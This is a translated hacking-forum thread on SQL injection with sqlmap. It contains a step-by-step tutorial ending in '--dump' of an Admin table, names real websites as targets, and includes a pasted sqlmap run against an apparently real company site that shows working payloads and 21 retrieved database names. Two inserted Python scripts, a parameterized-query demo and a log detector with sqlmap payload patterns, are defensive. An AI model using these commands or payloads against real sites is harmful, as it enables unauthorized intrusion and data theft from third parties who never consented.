SQLi Sqlmap.py
Do these two websites have a LOGIN PAGE:

http://www.moslerauto.com/
marylandendocrine.com

There should be one, bro...
try using an admin finder or dirbuster
Every Second, Every Minute, Every Hour, Every Day, It Never Ends

Does anyone know what the line below means?
[15:28:06] [INFO] using '/pentest/database/sqlmap/output/site.com/session' as session file

And how do you get into the DBs using the session???
If anyone knows, please share your knowledge??

(08-30-2011, 03:48 PM)Veronochi Wrote: OK friends, this time I'm going to share a tutorial on SQLi using SQLMAP, one of the pentest tools included in BackTrack...

OK, let's get straight to it rather than dragging on..

The first thing to do is turn on your laptop/PC running BackTrack; a virtual machine is fine too...

hihihiihih

OK, seriously now..

1. Open your SQLMap via
Code:
Application - Backtrack - Exploitation - Web Exploitation Tools - SqlMAP

2. Find a target whose vulnerability you have already located using a Google dork...

3. Once you have a site with a vulnerability, go ahead and pentest it..
Code:
python sqlmap.py -u http://site.com/catalog.php?id=129 --dbs
-u = URL
--dbs = we enumerate the database names...

4. After you've found the database name..
Code:
python sqlmap.py -u http://site.com/catalog.php?id=129 -D gatotganteng --tables
-D = the database name we found earlier
--tables = to list the tables..

5. The tables are listed and it turns out there is an admin table; let's look at its columns...
Code:
python sqlmap.py -u http://site.com/catalog.php?id=129 -D gatotganteng -T Admin --columns

Code:
python sqlmap.py -u http://site.com/catalog.php?id=129 -D gatotganteng -T Admin --dump

Once you've got this far, go ahead..

do whatever you want with it, but to be clear, I'm not responsible...


wkwkwkkwkwkkwk


That's it, don't forget the cendol (rep)

wkwkkwkwk

regards, veronochi

and I only want to share with people who want to learn...

nice share bro...
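The `catalog.php?id=129` parameter the tutorial above hands to sqlmap is injectable for one reason: the value is pasted into the SQL text. The script below is an added example, not part of the original thread or of sqlmap: an in-memory SQLite stand-in for such an endpoint (the table, column and row values are made up), showing the true/false differential that sqlmap's 'AND boolean-based blind' test looks for, next to a parameterized version in which the same two probes produce identical responses.

```python
"""Why a `catalog.php?id=129` style parameter falls to sqlmap.

Added example, not code from the thread or from sqlmap. The table,
column and rows below are constructed for the demonstration.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the site's catalog table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE catalog (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany(
        "INSERT INTO catalog VALUES (?, ?)",
        [(128, "widget"), (129, "gadget"), (130, "gizmo")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, id_param: str):
    """The classic bug: the query-string value is concatenated into the SQL."""
    sql = "SELECT name FROM catalog WHERE id = " + id_param
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn: sqlite3.Connection, id_param: str):
    """Hardened: check the type, then bind the value instead of concatenating."""
    if not id_param.isdigit():
        raise ValueError("id must be a positive integer")
    sql = "SELECT name FROM catalog WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (int(id_param),))]


def boolean_blind_differential(lookup, conn) -> bool:
    """Mimic sqlmap's first boolean-based blind check on one parameter.

    A true condition and a false condition are appended to the original value
    and the two responses compared. Differing responses (here: a row versus no
    row) mean the database evaluated the condition, i.e. the parameter is
    injectable. Identical responses mean the probe never reached the SQL.
    """
    def page(payload: str):
        try:
            return lookup(conn, payload)
        except (sqlite3.Error, ValueError):
            return None  # an error page, the same for both probes

    true_page = page("129 AND 3191=3191")
    false_page = page("129 AND 3191=3192")
    return true_page != false_page


if __name__ == "__main__":
    db = make_db()
    print("concatenated query injectable:", boolean_blind_differential(lookup_vulnerable, db))
    print("parameterized query injectable:", boolean_blind_differential(lookup_safe, db))
```

Run it directly to see `True` for the concatenated query and `False` for the bound one. The fix is the binding plus the type check; a blacklist of keywords such as `AND` or `SELECT` would still leave the differential in place for payloads the list misses.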


(06-08-2012, 03:36 PM)ria Wrote: root@anugeria:~# cd /pentest/database/sqlmap
root@anugeria:/pentest/database/sqlmap# python sqlmap.py -u www.**************.com/catalog.php?Id=4 --dbs

sqlmap/1.0-dev (r5108) - automatic SQL injection and database takeover tool
http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 22:17:02

[22:17:03] [INFO] using '/pentest/database/sqlmap/output/www.childrensfactory.com/session' as session file
[22:17:03] [INFO] testing connection to the target url
[22:17:06] [INFO] testing if the url is stable, wait a few seconds
[22:17:10] [INFO] url is stable
[22:17:10] [INFO] testing if GET parameter 'Id' is dynamic
[22:17:12] [INFO] confirming that GET parameter 'Id' is dynamic
[22:17:14] [INFO] GET parameter 'Id' is dynamic
[22:17:17] [WARNING] reflective value(s) found and filtering out
[22:17:17] [INFO] heuristic test shows that GET parameter 'Id' might be injectable (possible DBMS: Microsoft SQL Server)
[22:17:17] [INFO] testing sql injection on GET parameter 'Id'
[22:17:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:17:29] [INFO] GET parameter 'Id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
parsed error message(s) showed that the back-end DBMS could be Microsoft SQL Server. Do you want to skip test payloads specific for other DBMSes? [Y/n] y

[22:17:42] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[22:17:56] [INFO] GET parameter 'Id' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable
[22:17:56] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[22:18:02] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[22:18:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:18:05] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found
GET parameter 'Id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
---
Place: GET
Parameter: Id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Id=4 AND 3191=3191

Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: Id=4 AND 8177=CONVERT(INT,(CHAR(58)+CHAR(103)+CHAR(112)+CHAR(101)+CHAR(58)+(SELECT (CASE WHEN (8177=8177) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(112)+CHAR(111)+CHAR(105)+CHAR(58)))
---

[22:20:02] [INFO] testing Microsoft SQL Server
[22:20:05] [INFO] confirming Microsoft SQL Server
[22:20:12] [INFO] the back-end DBMS is Microsoft SQL Server

web application technology: Apache, PHP 5.2.5
back-end DBMS: Microsoft SQL Server 2005
[22:20:12] [INFO] fetching database names
[22:20:15] [INFO] the SQL query used returns 21 entries
[22:20:20] [INFO] retrieved: advancedreporting
[22:20:24] [INFO] retrieved: iERP85_CFCANADA
[22:20:29] [INFO] retrieved: iERP85_CONSOLIDATION
[22:20:41] [INFO] retrieved: iERP85_COSTING
[22:20:45] [INFO] retrieved: iERP85_EXTRA
[22:20:48] [INFO] retrieved: iERP85_GHE
[22:20:51] [INFO] retrieved: iERP85_LIVE
[22:20:53] [INFO] retrieved: iERP85_SANDBOX
[22:20:55] [INFO] retrieved: iERP85_TEST
[22:20:58] [INFO] retrieved: iERP85_WRI
[22:21:01] [INFO] retrieved: iERP85_WRII
[22:21:03] [INFO] retrieved: IT
[22:21:06] [INFO] retrieved: brother
[22:21:09] [INFO] retrieved: model
[22:21:11] [INFO] retrieved: msdb
[22:22:00] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[22:22:23] [INFO] retrieved: ReportServer
[22:22:45] [INFO] retrieved: ReportServerTempDB
[22:23:22] [INFO] retrieved: tempdb
[22:23:43] [INFO] retrieved: uniPoint_Live
[22:24:05] [INFO] retrieved: Unipoint_Training
[22:24:28] [INFO] retrieved: uniPoint_unidx
available databases [21]:
[*] advancedreporting
[*] iERP85_CFCANADA
[*] iERP85_CONSOLIDATION
[*] iERP85_COSTING
[*] iERP85_EXTRA
[*] iERP85_GHE
[*] iERP85_LIVE
[*] iERP85_SANDBOX
[*] iERP85_TEST
[*] iERP85_WRI
[*] iERP85_WRII
[*] IT
[*] brother
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] uniPoint_Live
[*] Unipoint_Training
[*] uniPoint_unidx

[22:24:29] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.childrensfactory.com'

[*] shutting down at 22:24:29



#which database should I pick to look up the --tables for, bro? there are so many.. hahahaha
root@anugeria:/pentest/database/sqlmap# python sqlmap.py -u www.**************.com/catalog.php?Id=4 --current-db
The --current-db option finds the database currently in use by that website.
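The run quoted above took 29 HTTP requests and left its payloads (`Id=4 AND 3191=3191`, `CONVERT(INT,(CHAR(58)+...`) in the target's web server log. The script below is an added example, not part of the thread or of sqlmap: detection logic for those probe shapes run over Apache/nginx combined-format access-log lines. The sample log lines, client IPs and paths are constructed for the demonstration; the payload patterns are the ones sqlmap reported above, and the User-Agent check relies on sqlmap's default `sqlmap/...` agent string, which an operator can replace with `--random-agent` or `--user-agent`.

```python
"""Spotting sqlmap probes like the ones in the run above in an access log.

Added example, not code from the thread or from sqlmap. The log lines,
addresses and paths are constructed; the payload shapes come from the
quoted sqlmap output (boolean-based blind and MSSQL error-based tests).
"""
import re
from urllib.parse import unquote_plus

# Apache/nginx "combined" format:
# host ident user [time] "METHOD path HTTP/x" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Each rule: (name, regex applied to the URL-decoded request path).
PAYLOAD_RULES = [
    # `Id=4 AND 3191=3191` / `AND 3191=3192`: the true/false pair of the
    # boolean-based blind test.
    ("boolean-blind numeric condition", re.compile(r"\bAND\s+\d+\s*=\s*\d+", re.I)),
    # `CONVERT(INT,(CHAR(58)+...))`: the MSSQL error-based marker.
    ("mssql error-based CONVERT", re.compile(r"CONVERT\s*\(\s*INT\s*,", re.I)),
    # CHAR()+CHAR()+... chains build strings without quote characters.
    ("CHAR() concatenation", re.compile(r"(CHAR\(\d+\)\s*\+\s*){3,}", re.I)),
    # MSSQL time-based probe shape.
    ("mssql time-based WAITFOR", re.compile(r"WAITFOR\s+DELAY", re.I)),
]

# sqlmap's default User-Agent names the tool unless --random-agent or
# --user-agent is used; cheap and high-confidence when present.
UA_RE = re.compile(r"^sqlmap/", re.I)


def analyze_line(line: str):
    """Return the names of the rules that fire on one log line ([] if none)."""
    m = LOG_RE.match(line.strip())
    if not m:
        return []
    hits = []
    decoded = unquote_plus(m.group("path"))
    for name, rule in PAYLOAD_RULES:
        if rule.search(decoded):
            hits.append(name)
    if UA_RE.search(m.group("ua")):
        hits.append("sqlmap user-agent")
    return hits


def analyze_log(lines):
    """Group hits by client IP.

    sqlmap needs dozens of requests from one source against one parameter
    (29 in the run above), so the count per IP is a stronger signal than
    any single line.
    """
    per_ip = {}
    for line in lines:
        hits = analyze_line(line)
        if hits:
            ip = LOG_RE.match(line.strip()).group("ip")
            per_ip.setdefault(ip, []).extend(hits)
    return per_ip


# Constructed sample log: one sqlmap-style session and one ordinary visitor.
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Jun/2012:22:17:03 +0700] "GET /catalog.php?Id=4 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [08/Jun/2012:22:17:29 +0700] "GET /catalog.php?Id=4%20AND%203191%3D3191 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
    '203.0.113.7 - - [08/Jun/2012:22:17:30 +0700] "GET /catalog.php?Id=4%20AND%203191%3D3192 HTTP/1.1" 200 4870 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
    '203.0.113.7 - - [08/Jun/2012:22:17:56 +0700] "GET /catalog.php?Id=4%20AND%208177%3DCONVERT(INT,(CHAR(58)%2BCHAR(103)%2BCHAR(112)%2BCHAR(101)%2BCHAR(58))) HTTP/1.1" 500 1210 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
    '198.51.100.23 - - [08/Jun/2012:22:18:00 +0700] "GET /catalog.php?Id=130 HTTP/1.1" 200 5100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, hits in analyze_log(SAMPLE_LOG).items():
        print(ip, len(hits), "signals:", sorted(set(hits)))
```

The decoding step matters: sqlmap sends the payload URL-encoded, so a rule run on the raw request line would see `%20AND%203191%3D3191` and miss. The rules above only confirm that probes arrived; whether the parameter was actually injectable is answered by the application's own error and response-size pattern (the 500 and the changing response size in the sample), not by the log alone.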


(06-24-2012, 04:00 PM)beeferr Wrote: Does anyone know what the line below means?
[15:28:06] [INFO] using '/pentest/database/sqlmap/output/site.com/session' as session file

And how do you get into the DBs using the session???
If anyone knows, please share your knowledge??
That refers to the session file that gets created when we inject. If you go into the folder /pentest/database/sqlmap/output/site.com/ there are two files, log and session,

the log contains a log of our injection activity,,
the session contains our injection session,, you can just look at its contents



naaaah....
so how do you find the admin page?
when using an online admin finder it sometimes isn't found...
how can a website not have an admin login...?
~{eMJe}~

Not every website uses an admin page; some use a control panel for their updates, some use FTP,
in BackTrack, use dirbuster to search for it,,

Thx for the info, bro..
very useful...
~{eMJe}~

scary, the HACKER in action

I want to ask...
besides joomscan, is there any other tool for scanning Joomla dorks?

sorry, still a new user....
root@1ch4l:~#